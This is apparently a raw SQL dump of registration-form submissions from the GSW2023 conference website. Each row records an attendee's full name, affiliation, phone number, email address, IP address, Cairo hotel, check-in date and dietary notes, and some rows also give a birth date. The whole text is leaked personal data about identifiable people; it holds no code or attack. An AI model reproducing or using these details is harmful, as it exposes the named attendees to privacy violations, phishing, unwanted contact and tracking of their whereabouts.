(30,1,30,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Miss.\",\"names\":{\"first_name\":\"Federica\",\"last_name\":\"Gaspari\"},\"country-list\":\"IT\",\"subject_2\":\"Politecnico di Milano\",\"input_text\":\"+393311060222\",\"email\":\"federica.gaspari@polimi.it\",\"numeric-field\":\"355\",\"subject_1\":\"Cleopatra Hotel\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Firefox','Windows','131.175.56.104',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 14:36:30','2023-08-28 14:36:30'),
(31,1,31,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"Paul\",\"last_name\":\"Debus\"},\"country-list\":\"DE\",\"subject_2\":\"Bauhaus-Universität Weimar\",\"input_text\":\"+4915735156325\",\"email\":\"paul.debus@uni-weimar.de\",\"numeric-field\":\"799\",\"subject_1\":\"Golden Tulip Hotel Flamenco\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"Vegetarian\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Firefox','Android','201.69.225.26',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 15:48:34','2023-08-28 15:48:34'),
(32,1,32,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"Julius\",\"last_name\":\"Knechtel\"},\"country-list\":\"DE\",\"subject_2\":\"University of Bonn\",\"input_text\":\"+49228731759\",\"email\":\"knechtel@igg.uni-bonn.de\",\"numeric-field\":\"1494\",\"subject_1\":\"Steigenberger El Tahrir\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Firefox','Windows','131.220.147.65',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 16:17:50','2023-08-28 16:17:50'),
(33,1,33,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"867b6231b5\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Prof.\",\"names\":{\"first_name\":\"Daniele\",\"last_name\":\"Alves\"},\"country-list\":\"BR\",\"subject_2\":\"São Paulo State University\",\"input_text\":\"55 18 996057369\",\"email\":\"daniele.barroca@unesp.br\",\"numeric-field\":\"1565\",\"subject_1\":\"Hilton Ramses\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"salad\\r\\nchicken\\r\\nfish\\r\\nfruit\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','200.145.183.183',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 16:59:09','2023-08-28 16:59:09'),
(34,1,34,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"867b6231b5\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Ms.\",\"names\":{\"first_name\":\"Aline Barroca\",\"last_name\":\"Marra\"},\"country-list\":\"BR\",\"subject_2\":\"São Paulo State University (Unesp)\",\"input_text\":\"+39 351 3509260\",\"email\":\"aline.barroca@unesp.br\",\"numeric-field\":\"000576\",\"subject_1\":\"Ramses Hilton\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','186.217.13.165',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 17:11:18','2023-08-28 17:11:18'),
(35,1,35,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"867b6231b5\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Miss.\",\"names\":{\"first_name\":\"Hsuan-Yi\",\"last_name\":\"Li\"},\"country-list\":\"TW\",\"subject_2\":\"Imperial College London\",\"input_text\":\"+447467328002\",\"email\":\"hsuan-yi.li22@imperial.ac.uk\",\"numeric-field\":\"1813\",\"subject_1\":\"Hathor House\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','146.169.239.216',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 18:17:24','2023-08-28 18:17:24'),
(36,1,36,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"867b6231b5\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Miss.\",\"names\":{\"first_name\":\"YUWEI\",\"last_name\":\"CAO\"},\"country-list\":\"CN\",\"subject_2\":\"Politecnico di Milano\",\"input_text\":\"00393898270313\",\"email\":\"yuwei.cao@polimi.it\",\"numeric-field\":\"1589\",\"subject_1\":\"14 Moustafa Abou HIF\",\"Check_in_Date\":\"03\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Safari','Apple','131.175.147.1',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 18:45:57','2023-08-28 18:45:57'),
(37,1,37,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"867b6231b5\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Ms.\",\"names\":{\"first_name\":\"Xiaoming\",\"last_name\":\"Gao\"},\"country-list\":\"CN\",\"subject_2\":\"Land Satellite Remote Sensing Application Center, Ministry of Natural Resources of the People’s Republic of China\",\"input_text\":\"86 - 13691074823\",\"email\":\"44761847@qq.com\",\"numeric-field\":\"1296\",\"subject_1\":\"Ramses Hilton Hotel\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"Chinese food\",\"message\":\"\",\"datetime\":\"13\\/01\\/1981\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','183.252.16.115',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 18:59:34','2023-08-28 18:59:34'),
(38,1,38,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Xian\",\"last_name\":\"Guo\"},\"country-list\":\"CN\",\"subject_2\":\"Beijing University of Civil Engineering and Architecture\",\"input_text\":\"(86)15972045629\",\"email\":\"guoxian@bucea.edu.cn\",\"numeric-field\":\"1971\",\"subject_1\":\"Ramses Hilton\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"All types are OK\",\"message\":\"We greatly appreciate your organizition of GSW2023. See you in Cairo XD\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','115.171.22.5',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 19:34:18','2023-08-28 19:34:18'),
(39,1,39,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"867b6231b5\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Miss.\",\"names\":{\"first_name\":\"SHREYA\",\"last_name\":\".\"},\"country-list\":\"IN\",\"subject_2\":\"International Institute of Information Technology, Hyderabad\",\"input_text\":\"+917903525759\",\"email\":\"shreya.k@research.iiit.ac.in\",\"numeric-field\":\"1166\",\"subject_1\":\"Flamenco Cairo Hotel\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','218.185.248.66',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 20:03:08','2023-08-28 20:03:08'),
(40,1,40,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"867b6231b5\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Marios\",\"last_name\":\"Tzouvaras\"},\"country-list\":\"GR\",\"subject_2\":\"ERATOSTHENES Centre of Excellence\",\"input_text\":\"0035799986689\",\"email\":\"marios.tzouvaras@eratosthenes.org.cy\",\"numeric-field\":\"1372\",\"subject_1\":\"Steigenberger Hotel El Tahrir\",\"Check_in_Date\":\"04\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"03\\/01\\/1983\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Android','2.85.115.167',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 20:14:40','2023-08-28 20:14:40'),
(41,1,41,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"867b6231b5\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"\",\"last_name\":\"\"},\"country-list\":\"BE\",\"subject_2\":\"Ghent University\",\"input_text\":\"+32476721473\",\"email\":\"wouter.vandenbroeck@ugent.be\",\"numeric-field\":\"1153\",\"subject_1\":\"Ramses Hilton\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Android','188.188.228.76',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 20:30:16','2023-08-28 20:30:16'),
(42,1,42,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"867b6231b5\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Prof.\",\"names\":{\"first_name\":\"Dessislava\",\"last_name\":\"Petrova-Antonova\"},\"country-list\":\"BG\",\"subject_2\":\"GATE Institute, Sofia University\",\"input_text\":\"+359887572094\",\"email\":\"d.petrova@fmi.uni-sofia.bg\",\"numeric-field\":\"227\",\"subject_1\":\"InterContinental Cairo Semiramis\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','213.91.236.246',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 20:40:53','2023-08-28 20:40:53'),
(43,1,43,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"867b6231b5\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Joanna\",\"last_name\":\"Zawadzka\"},\"country-list\":\"PL\",\"subject_2\":\"Cranfield University\",\"input_text\":\"+44 7446 257 706\",\"email\":\"joanna.zawadzka@cranfield.ac.uk\",\"numeric-field\":\"2157\",\"subject_1\":\"Up Town Hotel, Tahrir Square, Qasr Ad Dobarah, Abdeen, Cairo\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"Wheat free, gluten free\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','51.191.39.247',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 22:06:23','2023-08-28 22:06:23'),
(44,1,44,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Jie\",\"last_name\":\"Zhao\"},\"country-list\":\"CN\",\"subject_2\":\"TUM\",\"input_text\":\"+4915751367584\",\"email\":\"jie.zhao@tum.de\",\"numeric-field\":\"1035\",\"subject_1\":\"Flamenco Cairo Hotel\",\"Check_in_Date\":\"01\\/08\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','138.246.3.59',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 22:16:40','2023-08-28 22:16:40'),
(45,1,45,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"867b6231b5\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Ms.\",\"names\":{\"first_name\":\"Zhouyan\",\"last_name\":\"Qiu\"},\"country-list\":\"CN\",\"subject_2\":\"The university of Vigo\",\"input_text\":\"+34628047592\",\"email\":\"msqiuzy@outlook.com\",\"numeric-field\":\"1606\",\"subject_1\":\"Ramses Hilton Hotel\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"-\",\"message\":\"-\",\"datetime\":\"31\\/08\\/1994\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','78.94.111.209',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 23:12:12','2023-08-28 23:12:12'),
(46,1,46,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"867b6231b5\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Ms.\",\"names\":{\"first_name\":\"Zhaoju\",\"last_name\":\"Zheng\"},\"country-list\":\"CN\",\"subject_2\":\"Aerospace Information Research Institute, Chinese Academy of Sciences\",\"input_text\":\"+8618612016047\",\"email\":\"zhengzhaoju@aircas.ac.cn\",\"numeric-field\":\"802\",\"subject_1\":\"Grand Nile Tower Hotel\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','59.66.127.124',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-29 00:56:45','2023-08-29 00:56:45'),
(47,1,47,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"867b6231b5\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"Miguel Luis\",\"last_name\":\"Lagahit\"},\"country-list\":\"PH\",\"subject_2\":\"Tokyo Institute of Technology\",\"input_text\":\"+81 080-2023-7439\",\"email\":\"lagahit.m.aa@m.titech.ac.jp\",\"numeric-field\":\"1716\",\"subject_1\":\"Castle Hotel, Downtown Cairo\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Android','126.120.232.141',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-29 03:44:53','2023-08-29 03:44:53'),
(48,1,48,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"df22e5ed34\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"HAIPENG\",\"last_name\":\"CHEN\"},\"country-list\":\"CN\",\"subject_2\":\"National Quality Inspection and Testing Center for Surveying and Mapping Products\",\"input_text\":\"+86 13718602259\",\"email\":\"hachp@163.com\",\"numeric-field\":\"2081\",\"subject_1\":\"Ramses Hilton Hotel & Casino\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','117.136.0.110',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-29 04:52:18','2023-08-29 04:52:18'),
(49,1,49,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"df22e5ed34\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Ms.\",\"names\":{\"first_name\":\"WENLI\",\"last_name\":\"HAN\"},\"country-list\":\"CN\",\"subject_2\":\"National Quality Inspection and Testing Center for Surveying and Mapping Products\",\"input_text\":\"+86 13910993256\",\"email\":\"88212479@qq.com\",\"numeric-field\":\"2142\",\"subject_1\":\"Ramses Hilton Hotel & Casino\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','117.136.0.110',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-29 04:55:54','2023-08-29 04:55:54'),
(50,1,50,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"df22e5ed34\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Miss.\",\"names\":{\"first_name\":\"Yuanyuan\",\"last_name\":\"Wang\"},\"country-list\":\"CN\",\"subject_2\":\"Nanjing University of Aeronautics and Astronautics\",\"input_text\":\"+86 13083073592\",\"email\":\"yuanyuan.wang@nuaa.edu.cn\",\"numeric-field\":\"1842\",\"subject_1\":\"INTERCONTINENTAL CAIRO SEMIRAMIS\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','46.232.122.39',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-29 05:50:58','2023-08-29 05:50:58'),
(51,1,51,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"df22e5ed34\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Miss.\",\"names\":{\"first_name\":\"Rui\",\"last_name\":\"Sun\"},\"country-list\":\"CN\",\"subject_2\":\"Nanjing University of Aeronautics and Astronautics\",\"input_text\":\"+86 15601696801\",\"email\":\"rui.sun@nuaa.edu.cn\",\"numeric-field\":\"2059\",\"subject_1\":\"INTERCONTINENTAL CAIRO SEMIRAMIS\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','46.232.122.39',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-29 05:54:10','2023-08-29 05:54:10'),
(52,1,52,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"ARIEL\",\"last_name\":\"BLANCO\"},\"country-list\":\"PH\",\"subject_2\":\"Philippine Space Agency\",\"input_text\":\"+639989662207\",\"email\":\"ariel.blanco@philsa.gov.ph\",\"numeric-field\":\"716\",\"subject_1\":\"Ramses Hilton\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"Seafood\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','202.43.95.43',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-29 06:27:26','2023-08-29 06:27:26'),
(53,1,53,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"df22e5ed34\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Prof.\",\"names\":{\"first_name\":\"Yuan\",\"last_name\":\"Zhuang\"},\"country-list\":\"CN\",\"subject_2\":\"Wuhan University\",\"input_text\":\"9547065898\",\"email\":\"zhy.0908@gmail.com\",\"numeric-field\":\"1246\",\"subject_1\":\"InterContinental Cairo Semiramis\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"Asian food\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Apple','35.212.189.98',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-29 09:26:27','2023-08-29 09:26:27'),
(54,1,54,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"df22e5ed34\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Prof.\",\"names\":{\"first_name\":\"JUN\",\"last_name\":\"CHEN\"},\"country-list\":\"CN\",\"subject_2\":\"PROF.\",\"input_text\":\"+86-13901096882\",\"email\":\"isprs@ngcc.cn\",\"numeric-field\":\"2181\",\"subject_1\":\"Ramses Hilton\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"need transportation for one more accompany person: Ms. Xie Bingyu\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','218.244.250.66',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-29 10:01:04','2023-08-29 10:01:04'),
(55,1,55,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"df22e5ed34\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Prof.\",\"names\":{\"first_name\":\"Junfeng\",\"last_name\":\"Xie\"},\"country-list\":\"CN\",\"subject_2\":\"Ministry of Natural Resource\",\"input_text\":\"+86-10-18600929216\",\"email\":\"junfeng_xie@163.com\",\"numeric-field\":\"1689\",\"subject_1\":\"Ramses Hilton Hotel\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','123.127.227.1',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-29 10:19:05','2023-08-29 10:19:05'),
(56,1,56,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"df22e5ed34\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"Kavach\",\"last_name\":\"Mishra\"},\"country-list\":\"IN\",\"subject_2\":\"Indian Institute of Technology Roorkee\",\"input_text\":\"+919099379268\",\"email\":\"kmishra@ce.iitr.ac.in\",\"numeric-field\":\"1840\",\"subject_1\":\"Novotel Cairo Airport, Sheraton Al Matar, El Nozha, Cairo Governorate 11776, Egypt\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"Transfer from Hotel to Conference Venue required on 2 September 2023\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','103.37.201.178',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-29 11:10:59','2023-08-29 11:10:59'),
(57,1,57,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"df22e5ed34\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"Kavach\",\"last_name\":\"Mishra\"},\"country-list\":\"IN\",\"subject_2\":\"Indian Institute of Technology Roorkee\",\"input_text\":\"+919099379268\",\"email\":\"kmishra@ce.iitr.ac.in\",\"numeric-field\":\"1840\",\"subject_1\":\"Brassbell apartments in Zamalek, 15 Ismail Mohammed, Zamalek, Cairo, 12345, Egypt\",\"Check_in_Date\":\"03\\/09\\/2023\",\"description\":\"\",\"message\":\"Transfer from Hotel to Conference Venue required on 5 September 2023.\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','103.37.201.178',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-29 11:16:16','2023-08-29 11:16:16'),
(58,1,58,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"df22e5ed34\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Ms.\",\"names\":{\"first_name\":\"Mareike\",\"last_name\":\"Dorozynski\"},\"country-list\":\"DE\",\"subject_2\":\"Leibniz University Hannover\",\"input_text\":\"+49 175 12 64 800\",\"email\":\"dorozynski@ipi.uni-hannover.de\",\"numeric-field\":\"1639\",\"subject_1\":\"Hotel Novotel Cairo El Borg\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"vegetarian\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Firefox','Windows','130.75.85.200',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-29 11:28:00','2023-08-29 11:28:00'),
(59,1,59,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"df22e5ed34\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"Chima\",\"last_name\":\"Iheaturu\"},\"country-list\":\"NG\",\"subject_2\":\"University of Bern\",\"input_text\":\"+41767384360\",\"email\":\"chima.geomaven@gmail.com\",\"numeric-field\":\"1342\",\"subject_1\":\"New Grand Royal Hotel Cairo\",\"Check_in_Date\":\"31\\/08\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"14\\/03\\/1989\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','130.92.210.162',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-29 12:28:24','2023-08-29 12:28:24'),
(60,1,60,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"df22e5ed34\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"Petar\",\"last_name\":\"Jeremic\"},\"country-list\":\"RS\",\"subject_2\":\"MDPI\",\"input_text\":\"+381644595421\",\"email\":\"jeremic@mdpi.com\",\"numeric-field\":\"2046\",\"subject_1\":\"Garden Season Hotel 8 Ibrahim Naguib Garden City, Garden City, 11511 Cairo, Egypt\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Firefox','Windows','178.223.49.127',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-29 12:30:40','2023-08-29 12:30:40'),
(61,1,61,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"df22e5ed34\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Yan\",\"last_name\":\"Xia\"},\"country-list\":\"CN\",\"subject_2\":\"Technical University of Munich\",\"input_text\":\"+4901743885847\",\"email\":\"yan.xia@tum.de\",\"numeric-field\":\"1079\",\"subject_1\":\"Ramses Hilton\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"meat\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Apple','85.233.56.163',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-29 13:43:34','2023-08-29 13:43:34'),
(62,1,62,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"0bfb516be6\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Max\",\"last_name\":\"Mehltretter\"},\"country-list\":\"DE\",\"subject_2\":\"Institute of Photogrammetry and GeoInformation, Leibniz University Hannover\",\"input_text\":\"+4915772700293\",\"email\":\"mehltretter@ipi.uni-hannover.de\",\"numeric-field\":\"98\",\"subject_1\":\"Novotel Cairo El Borg\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','130.75.85.185',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-29 16:15:18','2023-08-29 16:15:18'),
